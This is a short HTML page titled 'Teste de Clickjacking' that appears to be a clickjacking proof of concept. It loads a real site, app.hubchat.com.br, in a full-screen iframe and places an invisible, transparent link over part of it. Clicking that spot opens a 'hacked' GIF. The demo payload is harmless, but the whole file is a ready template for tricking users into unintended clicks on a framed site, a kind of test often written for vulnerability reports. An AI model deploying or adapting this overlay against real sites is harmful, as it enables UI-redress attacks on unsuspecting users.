<!DOCTYPE html>
<html lang="pt-br">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <title>Teste de Clickjacking</title>
        <style>
            body {
                margin: 0;
                background-color: #080808;
                overflow: hidden;
            }
    
            iframe {
                width: 100%;
                height: 100%;
                opacity: 1.0; 
                position: absolute;
                top: 0;
                left: 0;
                border: none;
                z-index: 1; 
            }
    
            .invisible-link {
                position: absolute;
                top: 64%; 
                left: 42%; 
                width: 500px; 
                height: 45px; 
                margin-top: -25px; 
                margin-left: -100px; 
                z-index: 2;
                cursor: pointer;
                background-color: transparent;
            }
        </style>
</head>
<body>
        <iframe src="https://app.hubchat.com.br"></iframe>
        <a href="https://media.tenor.com/He2W0AQvZfsAAAAC/hacked-hack.gif" class="invisible-link" target="_blank" rel="noopener noreferrer"></a>
</body>
</html>